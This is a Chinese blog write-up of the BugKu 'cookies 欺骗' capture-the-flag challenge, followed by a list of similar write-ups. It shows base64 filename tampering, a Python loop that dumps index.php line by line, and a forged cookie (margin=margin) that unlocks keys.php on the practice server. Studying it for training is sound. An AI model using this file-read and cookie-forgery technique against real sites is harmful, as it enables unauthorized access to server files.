BugKu:cookies 欺骗

最新推荐文章于 2021-10-27 14:15:00 发布
最新推荐文章于 2021-10-27 14:15:00 发布
阅读量1.4k 收藏 2
点赞数 2
分类专栏: 网络安全 文章标签: BugKu:cookies 欺骗

查看源码后没有可用信息
观察url发现参数filename的值加密了
解密后filename=keys.txt
尝试用修改参数filename的值为index.php(注意此处index.php要用base64加密为aW5kZXgucGhw)

发现参数line没有给值,随意赋值如3,出现

写脚本抓原代码,先试一下有多少行,100,50,25,20都无回显,大约定在30

import requests
a=30
for i in range(a):
    url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw"
    s=requests.get(url)
    print (s.text)

读取的源码:

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");

$line=isset($_GET['line'])?intval($_GET['line']):0;

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);

 

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){

$file_list[2]='keys.php';

}

 

if(in_array($file, $file_list)){

$fa = file($file);

echo $fa[$line];

}

?>

分析源代码,当cookie的margin=margin时,可以访问一个keys.php文件
注意把参数filename的值改为base64加密后的keys.php

小草dym
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
伪造cookies --bugku 23cookies欺骗
s11show_163的博客
11-28 716
首先抬头看url发现有点儿类似sql注入,结尾base64解码后发现是key.txt于是根据经验先试一试如果是index.php会怎么样,前面的line=显然也可以传参数进去,于是写一个脚本如下: import requests import base64 r = requests.session() for i in range(30): url="http://123.206.87.240...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
Bugku——cookies欺骗
Dig_的博客
09-22 1119
URL的中的base64解码为keys.txt。 猜测文件名都是以base64的方式使用的。 key.txt的内容有些不明所以,干脆去索引页面(index.php)看看源码。 index.php用base64加密后替换key.txt的base64,页面存在却没有内容,查看源码发现只有&amp;amp;lt;?php ,说明源码需要加参数遍历。 发现给参数line一个个传入值才有源码,写脚本遍历出源码 import...
Bugku——cookie欺骗
csu_vc的博客
10-28 8409
看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2017-10-28 09:36:41 # @Author : csu_vc # @Link : http://blog.c
Bugku-Web-Cookies欺骗
豆傻小饼干随记
01-18 310
题目描述 解题思路 由于题目已经提示题目是cookies欺骗了,那么这个题目跟cookie或多或少有关联 先打开主页,发现了地址栏的变化与一串无规律的字符串 使用base64解码这个字符串 # -*- coding: utf-8 -*- # --author:valecalida-- from base64 import b64decode origin_url = "http://114.67.246.176:18338/index.php?line=&filename=a2
bugku CTF Web-20-cookies欺骗
weixin_47387913的博客
04-14 333
Web-20-cookies欺骗 一、尝试 提交flag的时候又忘记截图了,直接描述一下吧。 给出的网站进入后是一串不知道什么东西的代码,也不像什么加密,直接使用,但是网站进入后网址后面出现了一串编码,base64解密。 发现是读取的keys.txt里面的内容,改变line的值为1或0均相同,改变为2时无内容出现,说明无第二行内容。 直接尝试读取index.php里的内容 与keys.txt相同,把filename改为index.php,同样base64...
BugkuCTF-WEB题cookie欺骗
am_03的博客
08-29 937
知识点 isset: 检测变量是否设置,并且不是 NULL $_GET:收集来自 method=“get” 的表单里的值 intval() 函数用于获取变量的整数值。 in_array() 函数搜索数组里是否存在指定的值。 举例: <?php $am = array("Bill", "Steve", "trump", "David"); if (in_array("trump", $am)) { echo "匹配已找到"; } else { echo "匹配未找到"; } ?&
BUGKU-WEB
wojiushilsy的博客
02-22 514
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
BugKu -- cookies欺骗
热门推荐
小水池
08-11 1万+
cookies欺骗         100 http://120.24.86.145:8002/web11/ 答案格式:KEY{xxxxxxxx}  解题思路: 打开链接是一串没有意义的字符串,查看源码没有发现什么 观察url ,发现 a2V5cy50eHQ= 是一个base64编码,解码后是keys.txt http://120.24.86.145:8002/web11/i...
cookie欺骗bugku)
weixin_46396711的博客
04-28 1264
解题思路: 打开链接,发现是一串无意义的字符串 观察url,发现filename的值为base64编码格式,解码为keys.txt,line应该表示行,基于此,可通过改变line的值并将filename值改为index.php(记得转为base64格式),查看该文件的代码。 当line=1时 当line=2时 可通过python脚本将该文件内容打印出来 import requests a=25 #表示index.php文件的代码行数 for i in range(a): url="http:/
bugkucookies欺骗 writeup
perye
02-27 2997
看到url上的参数有base64,解码发现是keys.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来#!/usr/bin/env python # -*- coding: utf-8 -*- import requests s=requests.Session() url='http://120.24.86.145:8002/web11/in...
bugkucookies欺骗
Seaern的博客
08-02 632
题目链接 打开页面一长串的字母··············无用 源码······································无用 观察url http://123.206.87.240:8002/web11/index.php?line=&filename=a2V5cy50eHQ= 参数filename的值是a2V5cy50eHQ=是base64编码,解密后得到ke...
bugku——cookie欺骗
吃肉唐僧的博客
09-02 346
打开题目地址,一串不懂的重复的字符串 一眼就看出这个filename后面的是base64加密的字符,解密出来时keys.txt 后来访问keys.txt,发现还是这些重复的字符 后来试着将index.php也base64加密试下,而且变动line会有显示文件源码行数内容 写个脚本把他全部拿下来 前30行,代码如下 <?php error_reporting(0);...
bugku-cookies
m0_62094846的博客
10-27 1006
一串代码,试过各种解码方式,都没用 这串代码有点像base64,解码得到keys.txt,但代替代码后页面没有信息 那么这串代码可能是某种固定格式,尝试使用其他文件名代替,flag.php,index.php的base64代码依次尝试 但都没获得有用的信息 这时注意到有个line,查找一下 line表示当前文件的行数,后面什么数字都没有,显然无法出现文件 ...
bugku web cookies欺骗
weixin_43928140的博客
05-20 728
记录菜鸡生活的第十二天 首先打开题目时一串字符串了 开始没啥想法,但是注意到了后面的url然后拿去解密,发现是keys.txt,放上去试一下 发现没有内容了,然后再思考一下,看这个url里面?后面有两个参数,一个line一个filename,然后filename后面是用的base64编码格式,就感觉filename传递的就是 base64密文格式,然后u传给后台的base64.decode()...
cookies欺骗bugku-web)
小白的劝退之路
04-30 307
bugku-web-cookie欺骗
a3uRa的一个窝
08-14 896
url上有base64,解密得到filename=key.txt index.php用base64加密 同样方法,把加密后的字符串,放到filename的参数中,回车 查看源代码,发现 import requests s=requests.session() url='http://120.24.86.145:8002/web11/index.php' for i in range(0...
Bugku-WEB-cookies欺骗(缺一个python脚本)
Jaychouzzk
11-24 430
题目: 这里注意到filename=a2V5cy50eHQ=,应该是base64编码,解码一下,得到了keys.txt 想想应该怎么利用一下呢。题目是cookies欺骗,可能keys.txt中应该存在我们所需要的cookies   解题:这里想错了。。没仔细去看url,明显是打开的keys.txt才输出的这么多字符串,line应该是对应的行数 尝试打开index.php看看是否能将其...
全面解读: cookies使用与隐私法规指导
本文档提供关于《饼干指南》(Cookies Guidance)的详细信息,重点关注根据2003年《隐私与电子通信指令》(Privacy and Electronic Communications Directive Regulations, ECDR)对 cookies 和类似技术使用的法律...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值